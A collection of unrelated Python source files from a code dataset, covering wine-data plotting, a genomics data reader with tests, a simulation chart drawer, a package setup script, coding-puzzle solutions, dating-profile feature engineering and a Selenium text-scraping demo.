range(len(df_red_wine.columns)):\n df_red_wine.iloc[:,i].hist(alpha=0.5)\n df_white_wine.iloc[:,i].hist(alpha=0.5)\n plt.title(df_red_wine.columns[i], fontsize=18)\n plt.show()\n\ndef radar_chart(labels, values, title):\n angles = np.linspace(0, 2 * np.pi, len(labels), endpoint=False)\n values = np.concatenate((values, [values[0]]))\n angles = np.concatenate((angles, [angles[0]]))\n fig = plt.figure()\n ax = fig.add_subplot(111, polar=True)\n ax.plot(angles, values, 'o-', linewidth=2)\n ax.fill(angles, values, alpha=0.25)\n ax.set_thetagrids(angles * 180 / np.pi, labels)\n ax.set_title(title)\n ax.grid(True)\n # ax.set_rgrids([0.2, 0.4, 0.6, 0.8, 1.0])\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n# (1) Loading\n df_red_wine =read_data_to_dataframe(\"../data/winequality-red.csv\")\n df_white_wine =read_data_to_dataframe(\"../data/winequality-white.csv\")\n# (2) Pre-processing\n# Description\n # print(df_red_wine.describe())\n # print(df_white_wine.describe())\n# Histogram\n # Histograms(df_red_wine, df_white_wine)\n# Min-Max scaling and Radar Chart\n X_redwine = df_red_wine.iloc[:,:-1]\n y_redwine = df_red_wine.iloc[:,-1]\n\n X_whitewine = df_white_wine.iloc[:,:-1]\n y_whitewine = df_white_wine.iloc[:,-1]\n df_red_wine_scaled = (X_redwine - X_redwine.min()) / 
(X_redwine.max() - X_redwine.min())\n df_white_wine_scaled = (X_whitewine - X_whitewine.min()) / (X_whitewine.max() - X_whitewine.min())\n # labels = ['fixed_acidity','volatile_acidity','citric_acid','residual_sugar','chlorides',\n # 'free_sulfur_dioxide','total_sulfur_dioxide','density','pH','sulphates','alcohol','quality']\n # radar_chart(labels, df_red_wine_scaled.mean(), 'Red Wine Mean Radar Chart (0-1)')\n # radar_chart(labels, df_white_wine_scaled.mean(), 'White Wine Mean Radar Chart (0-1)')\n# Heat map\n# plot_corr(pd.concat([df_red_wine_scaled, y_redwine], axis=1))\n plot_corr(pd.concat([df_white_wine_scaled, y_whitewine], axis=1))\n\n# (3) Analyzing/Experiment\n# Random Forest\n# clf = RandomForestClassifier()\n# classifier_kfold_validation(df_red_wine, clf)\n# classifier_kfold_validation(df_white_wine, clf)\n\n# Support Vector Machine\n# clf = svm_estimation(df_red_wine)\n# clf = svm.SVC(kernel='rbf', gamma=0.01, C=1000)\n# classifier_kfold_validation(df_red_wine, clf)\n # classifier_kfold_validation(df_white_wine, clf)\n\n# Gradient Boosting\n# run_exhaustive_search(clf, df, 1, parameter_space)\n# train_acc, test_acc =classifier_learn(df_red_wine)\n#\n# data = [1, 5, 10, 25, 35, 50, 75, 100, 150, 175, 200]\n# from matplotlib import pyplot as plt\n#\n# plt.plot(data, train_acc)\n# plt.plot(data, test_acc)\n# plt.title('model accuracy')\n# plt.ylabel('accuracy')\n# plt.xlabel('number of rounds')\n# plt.legend(['train', 'val'], loc='upper left')\n# plt.show()\n\n # gavazn=\"\"\n\n # classifier_kfold_validation(df, clf)\n # train_acc, test_acc = classifier_learn(df_white_wine_scaled, y_whitewine)\n #\n # import matplotlib.pyplot as plt\n # C = [0.01, 0.1, 1, 10, 100, 1000]\n # # Kernel = ['linear', 'poly', 'rbf', 'sigmoid']\n # plt.plot(C, train_acc)\n # plt.plot(C, test_acc)\n # plt.title('red wine model accuracy')\n # plt.ylabel('accuracy')\n # plt.xlabel('SVM Kernel Parameter with C=1.0')\n # plt.legend(['train', 'val'], loc='upper left')\n # plt.show()\n","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"624627033","text":"from __future__ import absolute_import\nimport os\nimport shutil\nimport numpy as np\nimport logging\nimport unittest\nfrom pysnptools.snpreader import _MergeSIDs\nfrom pysnptools.snpreader import SnpReader, Bed\nfrom pysnptools.pstreader import PstReader\nfrom pysnptools.util import _multiopen\nfrom pysnptools.snpreader import _snps_fixup\nfrom pysnptools.util import log_in_place\nfrom pysnptools.util.mapreduce1 import map_reduce\nfrom pysnptools.util.filecache import FileCache\n\nclass DistributedBed(SnpReader):\n '''\n A class that implements the :class:`SnpReader` interface. It stores :class:`.Bed`-like data in pieces on storage. 
When you request data, it retrieves only the needed pieces.\n\n **Constructor:**\n :Parameters: **storage** (string or :class:`.FileCache`) -- Tells where the DistirubtedBed data is stored.\n A string can be given and will be interpreted as the path to a directory.\n A :class:`.FileCache` instance can be given, which provides a method to specify cluster-distributed storage.\n :type storage: string or :class:`.FileCache`\n\n :Example:\n\n >>> import os\n >>> from pysnptools.snpreader import DistributedBed\n >>> from pysnptools.util import example_file # Download and return local file name\n >>> folder = os.path.dirname(example_file('pysnptools/examples/toydataSkip10.distributedbed/*'))\n >>> data_on_disk = DistributedBed(folder)\n >>> print((data_on_disk.iid_count, data_on_disk.sid_count))\n (500, 1000)\n\n '''\n def __init__(self, storage):\n super(DistributedBed, self).__init__()\n\n self._ran_once = False\n self._storage = FileCache._fixup(storage)\n self._merge = None\n\n\n def __repr__(self): \n return \"{0}({1})\".format(self.__class__.__name__,self._storage)\n\n @property\n def row(self):\n \"\"\"*same as* :attr:`iid`\n \"\"\"\n self._run_once()\n return self._merge.row\n\n @property\n def col(self):\n \"\"\"*same as* :attr:`sid`\n \"\"\"\n self._run_once()\n return self._merge.col\n\n @property\n def col_property(self):\n \"\"\"*same as* :attr:`pos`\n \"\"\"\n self._run_once()\n return self._merge.col_property\n\n def _run_once(self):\n if self._ran_once:\n return\n self._ran_once = True\n\n _metadatanpz = \"metadata.npz\"\n with self._storage.open_read(_metadatanpz) as handle_metadatanpz_file_name:\n #self._file_dict[\"metadatanpz\"] = handle_metadatanpz\n _reader_name_listnpz = \"reader_name_list.npz\"\n with self._storage.open_read(_reader_name_listnpz) as handle_reader_name_listnpz_file_name:\n reader_name_list = np.array(np.load(handle_reader_name_listnpz_file_name)['reader_name_list'],dtype='str')\n #self._file_dict[\"reader_name_listnpz\"] = handle_reader_name_listnpz\n\n reader_list = [_Distributed1Bed(reader_name,self._storage) for reader_name in reader_name_list]\n\n self._merge = _MergeSIDs(reader_list,cache_file=handle_metadatanpz_file_name,skip_check=True)\n\n for reader in reader_list:\n reader._row = self._merge.row\n\n def __getstate__(self):\n return self._storage\n\n def __setstate__(self,state):\n storage = state\n self.__init__(storage)\n\n\n def copyinputs(self, copier):\n pass\n\n def _read(self, iid_index_or_none, sid_index_or_none, order, dtype, force_python_only, view_ok, num_threads):\n self._run_once()\n dtype = np.dtype(dtype)\n\n return self._merge._read(iid_index_or_none, sid_index_or_none, order, dtype, force_python_only, view_ok, num_threads)\n\n #!!! in future could make a default for piece_per_chrom_count that made each piece some GB size\n @staticmethod\n def write(storage, snpreader, piece_per_chrom_count=1, updater=None, runner=None): #!!! might want to set pieces_per_chrom such that it is a certain size\n '''\n Uploads from any :class:`.Bed`-like data to cluster storage for efficient retrieval later.\n If some of the contents already exists in storage, it skips uploading that part of the contents. (To avoid this behavior,\n clear the storage.)\n\n :param storage: Tells where to store SNP data.\n A string can be given and will be interpreted as the path of a local directory to use for storage. (The local\n directory will **not** be automatically erased and so must be user managed.) 
\n A :class:`.FileCache` instance can be given, which provides a\n method to specify cluster-distributed storage. (:class:`.FileCache`'s will **not** be automatically erased and must be user managed.)\n If `None`, the storage will be in an automatically-erasing temporary directory. (If the TEMP environment variable is set, Python places the temp directory under it.)\n \n :type storage: string or :class:`.FileCache` or None.\n\n :param snpreader: A :class:`.Bed` or other :class:`.SnpReader` with values of 0,1,2, or missing.\n (Note that this differs from most other `write` methods that take a :class:`.SnpData`)\n :type snpreader: :class:`.SnpReader`\n\n :param piece_per_chrom_count: The number of pieces in which to store the data from each chromosome. Data is split across\n SNPs. For exmple, if `piece_per_chrom_count` is set to 100 and 22 chromosomes are uploaded, then data will be stored in 2200 pieces. Later, when data is requested\n only the pieces necessary for the request will be downloaded to local storage.\n :type piece_per_chrom_count: A number\n\n :param updater: A single argument function to write logging message to, for example, the function created by :func:`.log_in_place`.\n :type updater: A function or lambda\n\n :param runner: a :class:`.Runner`, optional: Tells how to run.\n (Note that :class:`.Local` and :class:`.LocalMultProc` are good options.)\n If not given, the function is run locally.\n :type runner: :class:`.Runner`\n\n :rtype: DistributedBed\n\n >>> from pysnptools.snpreader import DistributedBed, Bed\n >>> import shutil\n >>> from pysnptools.util import example_file # Download and return local file name\n >>> directory = 'tempdir/toydataSkip10.distributedbed'\n >>> if os.path.exists(directory):\n ... shutil.rmtree(directory)\n >>> bedfile = example_file(\"pysnptools/examples/toydata.5chrom.*\",\"*.bed\")\n >>> snpreader = Bed(bedfile,count_A1=False)[:,::10] # Read every 10 snps from Bed format\n >>> DistributedBed.write(directory,snpreader,piece_per_chrom_count=5) # Write data in DistributedBed format\n DistributedBed(LocalCache('tempdir/toydataSkip10.distributedbed'))\n\n\n '''\n from pysnptools.util import _file_transfer_reporter\n from pysnptools.util.filecache import FileCache\n\n count_A1 = True #Make all these's the same for reading and writing so that nothing will change.\n snpreader = _snps_fixup(snpreader, count_A1=count_A1)\n\n storage = FileCache._fixup(storage)\n\n chrom_set = sorted(set(snpreader.pos[:,0]))\n for chrom in chrom_set:\n assert chrom==chrom and chrom==int(chrom), \"DistributedBed.write expects all chromosomes to be integers (not '{0}')\".format(chrom)\n with _file_transfer_reporter(\"DistributedBed.write\", size=0, updater=updater) as updater2:\n def mapper_closure(chrom):\n chrom_reader = snpreader[:,snpreader.pos[:,0]==chrom]\n def nested_closure(piece_per_chrom_index):\n start = chrom_reader.sid_count * piece_per_chrom_index // piece_per_chrom_count\n stop = chrom_reader.sid_count * (piece_per_chrom_index+1) // piece_per_chrom_count\n piece_reader = chrom_reader[:,start:stop]\n _piece_name_list = [\"chrom{0}.piece{1}of{2}.{3}\".format(int(chrom),piece_per_chrom_index,piece_per_chrom_count,suffix) for suffix in ['bim','fam','bed']]\n exist_list = [storage.file_exists(_piece_name) for _piece_name in _piece_name_list]\n if sum(exist_list) < 3: #If all three of the BIM/FAM/BED files are already there, then skip the upload, otherwise do the upload\n for i in range(3): #If one or two of BIM/FAM/BED are there, remove them\n if 
exist_list[i]:\n storage.remove(_piece_name_list[i])\n _Distributed1Bed.write(_piece_name_list[-1],storage,piece_reader.read(),count_A1=count_A1,updater=updater2)\n return _piece_name_list[-1]\n return map_reduce(range(piece_per_chrom_count),\n mapper=nested_closure,\n )\n list_list_pair = map_reduce(chrom_set,\n nested = mapper_closure,\n runner=runner,\n ) \n\n reader_name_list = []\n reader_list = []\n for chrom_result in list_list_pair:\n for _piece_name in chrom_result:\n reader_name_list.append(_piece_name)\n reader_list.append(_Distributed1Bed(_piece_name,storage))\n \n\n _metadatanpz = \"metadata.npz\"\n with storage.open_write(_metadatanpz) as local_metadatanpz:\n _reader_name_listnpz = \"reader_name_list.npz\"\n with storage.open_write(_reader_name_listnpz) as local_reader_name_listnpz:\n reader_name_list_ascii = np.array(reader_name_list,dtype='S')\n np.savez(local_reader_name_listnpz,reader_name_list=reader_name_list_ascii)\n if os.path.exists(local_metadatanpz):\n os.remove(local_metadatanpz)\n _MergeSIDs(reader_list,cache_file=local_metadatanpz,skip_check=True)\n\n return DistributedBed(storage)\n\nclass _Distributed1Bed(SnpReader):\n '''\n An atomic set of bed/bim/fam files stored somewhere. Can answer metadata questions without downloading the *.bed file.\n But does download the whole *.bed file when any SNP value is requested.\n '''\n def __init__(self,path,storage):\n super(_Distributed1Bed, self).__init__()\n\n self._ran_once = False\n self._file_dict = {}\n\n self._storage = storage\n self.path = path\n self.local = None\n\n def __repr__(self): \n return \"{0}('{1}','{2}')\".format(self.__class__.__name__,self.path,self._storage)\n\n\n @property\n def row(self):\n \"\"\"*same as* :attr:`iid`\n \"\"\"\n if not hasattr(self,\"_row\"):\n _fam = SnpReader._name_of_other_file(self.path,remove_suffix=\"bed\", add_suffix=\"fam\")\n local_fam = self._storage.open_read(_fam)\n self._row = SnpReader._read_fam(local_fam.__enter__(),remove_suffix=\"fam\")\n self._file_dict[\"fam\"] = local_fam\n return self._row\n\n @property\n def col(self):\n \"\"\"*same as* :attr:`sid`\n \"\"\"\n if not hasattr(self,\"_col\"):\n _bim = SnpReader._name_of_other_file(self.path,remove_suffix=\"bed\", add_suffix=\"bim\")\n local_bim = self._storage.open_read(_bim)\n self._col, self._col_property = SnpReader._read_map_or_bim(local_bim.__enter__(),remove_suffix=\"bim\", add_suffix=\"bim\")\n self._file_dict[\"bim\"] = local_bim\n return self._col\n\n @property\n def col_property(self):\n \"\"\"*same as* :attr:`pos`\n \"\"\"\n if not hasattr(self,\"_col\"):\n self.col #get col info\n return self._col_property\n\n def _run_once(self):\n if self._ran_once:\n return\n self._ran_once = True\n self.row # get row info\n self.col # get col info\n\n _bed = SnpReader._name_of_other_file(self.path,remove_suffix=\"bed\", add_suffix=\"bed\")\n local_bed = self._storage.open_read(_bed)\n self.local = Bed(local_bed.__enter__(),count_A1=True,iid=self.row,sid=self.col,pos=self.col_property,skip_format_check=True)\n self._file_dict[\"bed\"] = local_bed\n\n def __del__(self):\n for handle in self._file_dict.values():\n handle.__exit__(None,None,None)\n self._file_dict = {}\n \n \n def copyinputs(self, copier):\n pass\n\n def _read(self, iid_index_or_none, sid_index_or_none, order, dtype, force_python_only, view_ok, num_threads):\n self._run_once()\n dtype = np.dtype(dtype)\n\n return self.local._read(iid_index_or_none, sid_index_or_none, order, dtype, force_python_only, view_ok, num_threads)\n \n @staticmethod\n def 
write(path, storage, snpdata, count_A1=True, updater=None):\n file_list = [SnpReader._name_of_other_file(path,remove_suffix=\"bed\", add_suffix=new_suffix) for new_suffix in [\"bim\",\"fam\",\"bed\"]] #'bed' should be last\n with _multiopen(lambda file_name:storage.open_write(file_name,updater=updater),file_list) as local_file_name_list:\n Bed.write(local_file_name_list[-1],snpdata,count_A1=count_A1)\n\n return _Distributed1Bed(path,storage)\n\n\nclass TestDistributedBed(unittest.TestCase): \n\n def test1(self):\n logging.info(\"in TestDistributedBed test1\")\n from pysnptools.snpreader import SnpGen, DistributedBed\n snpgen = SnpGen(seed=0,iid_count=100,sid_count=100)\n\n temp_dir = 'tempdir/distributed_bed_test1'\n if os.path.exists(temp_dir):\n shutil.rmtree(temp_dir)\n distributed_bed = DistributedBed.write(temp_dir,snpgen,piece_per_chrom_count=2)\n snpdata = distributed_bed.read()\n\n ref1 = DistributedBed(os.path.dirname(os.path.realpath(__file__))+'/../../tests/datasets/distributed_bed_test1').read()\n assert(snpdata.allclose(ref1,equal_nan=True))\n\n ref2 = Bed(os.path.dirname(os.path.realpath(__file__))+'/../../tests/datasets/distributed_bed_test1_X.bed',count_A1=False).read()\n assert(snpdata.allclose(ref2,equal_nan=True))\n\n\ndef getTestSuite():\n \"\"\"\n set up composite test suite\n \"\"\"\n \n test_suite = unittest.TestSuite([])\n test_suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestDistributedBed))\n return test_suite\n\n\nif __name__ == \"__main__\":\n import doctest\n logging.basicConfig(level=logging.INFO)\n\n if False:\n from pysnptools.snpreader import DistributedBed, Bed\n import shutil\n directory = 'tempdir/toydataSkip10.distributedbed'\n if os.path.exists(directory):\n shutil.rmtree(directory)\n snpreader = Bed('../examples/toydata.5chrom.bed',count_A1=False)[:,::10] # Read every 10 snps from Bed format\n DistributedBed.write(directory,snpreader,piece_per_chrom_count=5) # Write data in DistributedBed format\n\n result = doctest.testmod(optionflags=doctest.ELLIPSIS)\n assert result.failed == 0, \"failed doc test: \" + __file__\n\n\n suites = getTestSuite()\n r = unittest.TextTestRunner(failfast=True)\n ret = r.run(suites)\n assert ret.wasSuccessful()\n\n\n\n","sub_path":"pysnptools/snpreader/distributedbed.py","file_name":"distributedbed.py","file_ext":"py","file_size_in_byte":15181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"302077937","text":"\"\"\"\nVisualizations of simulation results.\n\"\"\"\n\nfrom typing import Any, Iterable, Optional, Sequence, Tuple, Type, TypeVar, Union\n\nfrom pytools.api import AllTracker, inheritdoc\nfrom pytools.viz import Drawer\n\nfrom ._style import SimulationMatplotStyle, SimulationReportStyle, SimulationStyle\nfrom facet.simulation import UnivariateSimulationResult\n\n__all__ = [\"SimulationDrawer\"]\n\n#\n# Type variables\n#\n\n\nT_Number = TypeVar(\"T_Number\", int, float)\n\n#\n# Ensure all symbols introduced below are included in __all__\n#\n\n__tracker = AllTracker(globals())\n\n\n#\n# Class definitions\n#\n\n\n@inheritdoc(match=\"[see superclass]\")\nclass SimulationDrawer(Drawer[UnivariateSimulationResult, SimulationStyle]):\n \"\"\"\n Draws the result of a univariate simulation, represented by a\n :class:`.UnivariateSimulationResult` object.\n \"\"\"\n\n #: if ``True``, plot the histogram of observed values for the feature being\n #: simulated; if ``False``, do not plot the histogram\n histogram: bool\n\n def __init__(\n self,\n style: 
Optional[Union[SimulationStyle, str]] = None,\n histogram: bool = True,\n ) -> None:\n \"\"\"\n :param histogram: if ``True``, plot the histogram of observed values for the\n feature being simulated; if ``False``, do not plot the histogram (default:\n ``True``).\n \"\"\"\n super().__init__(style=style)\n self.histogram = histogram\n\n __init__.__doc__ = Drawer.__init__.__doc__ + __init__.__doc__\n\n def draw(\n self, data: UnivariateSimulationResult, title: Optional[str] = None\n ) -> None:\n \"\"\"\n Draw the simulation chart.\n\n :param data: the univariate simulation to draw\n :param title: the title of the chart (optional, defaults to the name of the\n simulated feature)\n \"\"\"\n if title is None:\n title = f\"Simulation: {data.feature_name}\"\n super().draw(data=data, title=title)\n\n @classmethod\n def get_style_classes(cls) -> Iterable[Type[SimulationStyle]]:\n \"\"\"[see superclass]\"\"\"\n\n return [\n SimulationMatplotStyle,\n SimulationReportStyle,\n ]\n\n def _draw(self, data: UnivariateSimulationResult) -> None:\n # If the partitioning of the simulation is categorical, sort partitions in\n # ascending order of the median output\n simulation_result: Tuple[\n Sequence[float],\n Sequence[float],\n Sequence[float],\n Sequence[Any],\n Sequence[int],\n ] = (\n data.outputs_median().to_list(),\n data.outputs_lower_bound().to_list(),\n data.outputs_upper_bound().to_list(),\n data.partitioner.partitions_,\n data.partitioner.frequencies_,\n )\n\n if data.partitioner.is_categorical:\n # for categorical features, sort the categories by the median uplift\n simulation_result = tuple(\n *zip(*sorted(zip(*simulation_result), key=lambda x: x[0]))\n )\n\n # draw the graph with the uplift curves\n self.style.draw_uplift(\n feature_name=data.feature_name,\n output_name=data.output_name,\n output_unit=data.output_unit,\n outputs_median=simulation_result[0],\n outputs_lower_bound=simulation_result[1],\n outputs_upper_bound=simulation_result[2],\n baseline=data.baseline,\n confidence_level=data.confidence_level,\n partitions=simulation_result[3],\n frequencies=simulation_result[4],\n is_categorical_feature=data.partitioner.is_categorical,\n )\n\n if self.histogram:\n # draw the histogram of the simulation values\n self.style.draw_histogram(\n partitions=simulation_result[3],\n frequencies=simulation_result[4],\n is_categorical_feature=data.partitioner.is_categorical,\n )\n\n\n__tracker.validate()\n","sub_path":"src/facet/simulation/viz/_draw.py","file_name":"_draw.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"95268302","text":"from setuptools import setup\n\n\ndef local_version(version):\n \"\"\"\n Patch in a version that can be uploaded to test PyPI\n \"\"\"\n return \"\"\n\nsetup(\n use_scm_version={\n 'write_to': 'disdat_kfp/version.py',\n 'write_to_template': '__version__ = \"{version}\"',\n 'local_scheme': local_version\n },\n\n setup_requires=['setuptools_scm'],\n\n name='disdat-kfp',\n # version='0.0.4rc02',\n packages=['disdat_kfp'],\n install_requires=[\n 'disdat >= 0.9.16',\n 'kfp == 1.6.5'\n ],\n # Choose your license\n license='Apache License, version 2.0',\n author='Ken Yocum, Zixuan Zhang',\n author_email='kyocum@gmail.com, zz2777@columbia.edu',\n url='https://github.com/kyocum/disdat-kfp',\n\n extras_require={\n 'dev': [\n 'pytest',\n 'ipython',\n 'pytest-xdist',\n 'twine',\n 'build'\n ],\n },\n\n classifiers=[\n # How mature is this project? 
Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 4 - Beta',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: Apache Software License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 3.8',\n 'Operating System :: OS Independent',\n 'Natural Language :: English',\n ],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"564431057","text":"#!/bin/python3\n\n\"\"\"\nhttps://www.hackerrank.com/challenges/counting-valleys/problem\n\"\"\"\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'countingValleys' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER steps\n# 2. STRING path\n#\n\ndef countingValleys(steps, path):\n # Write your code here\n valleys_cnt = 0 \n height = 0\n for idx, p in enumerate(path):\n unit = {'D': -1, 'U': 1}.get(p)\n if idx > 0 and height < 0 and height + unit == 0:\n valleys_cnt += 1 \n height += unit\n \n return valleys_cnt\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n steps = int(input().strip())\n\n path = input()\n\n result = countingValleys(steps, path)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","sub_path":"archive-dhkim/hackerrank/interview_preparation_kit/01_warmup_challenges/counting_valleys.py","file_name":"counting_valleys.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402335280","text":"import pandas as pd\r\nimport numpy as np\r\nfrom collections import Counter\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\n# Create your df here:\r\ndf = pd.read_csv(\"profiles.csv\")\r\npd.set_option('display.max_columns', None)\r\n\r\n\r\n#Mapping values to certain features\r\ndrinks_mapping = {'not at all': 0, 'rarely': 1, 'socially': 2, 'often': 3, 'very often': 4, 'desperately': 5}\r\nsmokes_mapping = {'no': 0, 'trying to quit': 1, 'sometimes': 2, 'when drinking': 3, 'yes': 4}\r\ndrugs_mapping = {'never': 0, 'sometimes': 1, 'often': 2}\r\nsex_mapping = {'m': 0, 'f': 1}\r\nwork = 'working on '\r\ndrop = 'dropped out of '\r\ngrad = 'graduated from '\r\n#An attempt to rank education both on level of schooling and whether the individual finished or not\r\neducation_mapping = {\r\n '{}high school'.format(drop): 0,\r\n '{}high school'.format(work): 1,\r\n 'high school': 2,\r\n '{}high school'.format(grad): 3,\r\n '{}space camp'.format(drop): 0,\r\n '{}space camp'.format(work): 1,\r\n 'space camp': 2,\r\n '{}space camp'.format(grad): 3,\r\n '{}two-year college'.format(drop): 1,\r\n '{}two-year college'.format(work): 2,\r\n 'two-year college': 3,\r\n '{}two-year college'.format(grad): 4,\r\n '{}college/university'.format(drop): 2,\r\n '{}college/university'.format(work): 3,\r\n 'college/university': 4,\r\n '{}college/university'.format(grad): 5,\r\n '{}masters program'.format(drop): 3,\r\n '{}masters program'.format(work): 4,\r\n 'masters program': 5,\r\n '{}masters program'.format(grad): 6,\r\n '{}med school'.format(drop): 
3,\r\n '{}med school'.format(work): 4,\r\n 'med school': 5,\r\n '{}med school'.format(grad): 6,\r\n '{}law school'.format(drop): 3,\r\n '{}law school'.format(work): 4,\r\n 'law school': 5,\r\n '{}law school'.format(grad): 6,\r\n\r\n}\r\n\r\n#Attempting to rank diet based on how strict/loose someone is with their diet, so diets with more restrictions are rated higher\r\n#and people who said \"strictly\" were ranked highest within each category of diet\r\ndiet_mapping = {\r\n 'anything': 0,\r\n 'mostly anything': 1,\r\n 'strictly anything': 2,\r\n 'mostly vegetarian': 3,\r\n 'vegetarian': 4,\r\n 'strictly vegetarian': 5,\r\n 'mostly vegan': 6,\r\n 'vegan': 7,\r\n 'strictly vegan': 8,\r\n 'mostly other': 2,\r\n 'other': 3,\r\n 'strictly other': 4,\r\n 'mostly halal': 1,\r\n 'halal': 2,\r\n 'strictly halal': 3,\r\n 'mostly kosher': 1,\r\n 'kosher': 2,\r\n 'strictly kosher': 3\r\n}\r\n\r\n#Editing the rows in df['sign'] so they all just say the sign and can be used in further machine learning algorithms\r\nsigns = ['aquarius', 'aries', 'taurus', 'gemini', 'cancer', 'leo',\r\n 'virgo', 'libra', 'scorpio', 'sagittarius', 'capricorn', 'pisces'\r\n ]\r\n\r\ndf.dropna(subset=['sign'], inplace=True)\r\ndf['sign_refined'] = np.where(df['sign'].str.contains(signs[0]), signs[0],\r\n np.where(df['sign'].str.contains(signs[1]), signs[1],\r\n np.where(df['sign'].str.contains(signs[2]), signs[2],\r\n np.where(df['sign'].str.contains(signs[3]), signs[3],\r\n np.where(df['sign'].str.contains(signs[4]), signs[4],\r\n np.where(df['sign'].str.contains(signs[5]), signs[5],\r\n np.where(df['sign'].str.contains(signs[6]), signs[6],\r\n np.where(df['sign'].str.contains(signs[7]), signs[7],\r\n np.where(df['sign'].str.contains(signs[8]), signs[8],\r\n np.where(df['sign'].str.contains(signs[9]), signs[9],\r\n np.where(df['sign'].str.contains(signs[10]), signs[10],\r\n np.where(df['sign'].str.contains(signs[11]), signs[11],\r\n 'No'))))))))))))\r\n\r\n\r\n#Adding the maps to the dataframe\r\ndf['drinks_code'] = df.drinks.map(drinks_mapping)\r\ndf['drugs_code'] = df.drugs.map(drugs_mapping)\r\ndf['smokes_code'] = df.smokes.map(smokes_mapping)\r\ndf['education_code'] = df.education.map(education_mapping)\r\ndf['diet_code'] = df.diet.map(diet_mapping)\r\ndf['sex_code'] = df.sex.map(sex_mapping)\r\ndf['income_reported'] = df.income.drop(df[df.income == -1].index) #There was some weird data in income that I had to remove\r\n\r\n\r\nessay_cols = [\"essay0\",\"essay1\",\"essay2\",\"essay3\",\"essay4\",\"essay5\",\"essay6\",\"essay7\",\"essay8\",\"essay9\"]\r\ndrop_words = [\"essay0\",\"essay1\",\"essay2\",\"essay3\",\"essay4\",\"essay5\",\"essay6\",\"essay7\",\"essay8\",\"essay9\"]\r\n\r\n#Combining the essays\r\n#df['all_essays'] = all_essays.apply(lambda x: str(x).lower().split(), axis=1).reset_index(drop=True)\r\nall_essays = df[essay_cols].apply(lambda x: str(x).lower(), axis=1).reset_index(drop=True)\r\ndf['all_essays'] = df[essay_cols].apply(lambda x: str(x).lower(), axis=1).reset_index(drop=True)\r\ndf['essay_length'] = df['all_essays'].apply(lambda x: str(x).split()).apply(lambda x: len(x))\r\n\r\n# Removing the NaNs\r\ndf.dropna(subset=essay_cols, inplace=True)\r\ndf.to_pickle(\"clean_df\")\r\n","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"190037289","text":"\"\"\"\n@File : 3_获取文本_.1_HHHTRQRL_Login.py\n@Time : 2020/5/14 4:08 下午\n@Author : 
FeiLong\n@Software: PyCharm\n\"\"\"\nfrom selenium import webdriver\n\n# The r prefix keeps the path from being treated as escape sequences; to get the driver path, drag the driver file into a terminal and the path will appear\nweb_driver=webdriver.Chrome(r'/Users/feilong/02_应用/chromedriver_mac64/chromedriver')\n\nweb_driver.get('http://f.python3.vip/webauto/sample1.html')\n\n# find_elements_by_class_name() gets all elements with the given class name; returns an empty list if none are found\nclass_names=web_driver.find_elements_by_class_name('plant')\n# The result is a list, so loop over it and use .text to get each element's text\nfor i in class_names:\n    print(i.text)\n\n# find_element_by_class_name() gets the first element with the given class name; raises an exception if none is found\nclass_name=web_driver.find_element_by_class_name('animal')\n# A single element is returned, so .text directly gives its text\nprint(class_name.text)\n\nweb_driver.quit()","sub_path":"10_Demo_Selenium/3_Selenium操作元素/3_获取文本_.text.py","file_name":"3_获取文本_.text.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"182059929","text":"# PROBLEM DESCRIPTION:\n# Given an array of intervals where intervals[i] = [start_i, end_i], merge all overlapping intervals,\n# and return an array of the non-overlapping intervals that cover all the intervals in the input.\n# \n# EXAMPLE 1:\n# INPUT                                          OUTPUT:\n# intervals = [[1,3],[2,6],[8,10],[15,18]]       [[1,6],[8,10],[15,18]]\n# EXPLANATION: Since intervals [1,3] and [2,6] overlap, merge them into [1,6].\n#\n# EXAMPLE 2:\n# INPUT                                          OUTPUT:\n# intervals = [[1,4],[4,5]]                      [[1,5]]\n# EXPLANATION: Intervals [1,4] and [4,5] are considered overlapping.\n# \n# CONSTRAINTS:\n# 1 <= intervals.length <= 10^4\n# intervals[i].length == 2\n# 0 <= start_i <= end_i <= 10^4\n\nfrom typing import List\n\nclass Solution:\n    def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n        if not intervals:\n            return [[]]\n        \n        # sort intervals as there is no sequence defined\n        intervals.sort(key=lambda x: x[0])\n        \n        result = []\n        start, end = intervals[0]\n        for interval in intervals[1:]:\n            if interval[0] <= end:\n                # take max of end as for intervals like -- [[1,4], [2,3]] --> [[1,4]]\n                end = max(end, interval[1])\n            else:\n                result.append([start, end])\n                start, end = interval[0], interval[1]\n        \n        result.append([start, end])\n        return 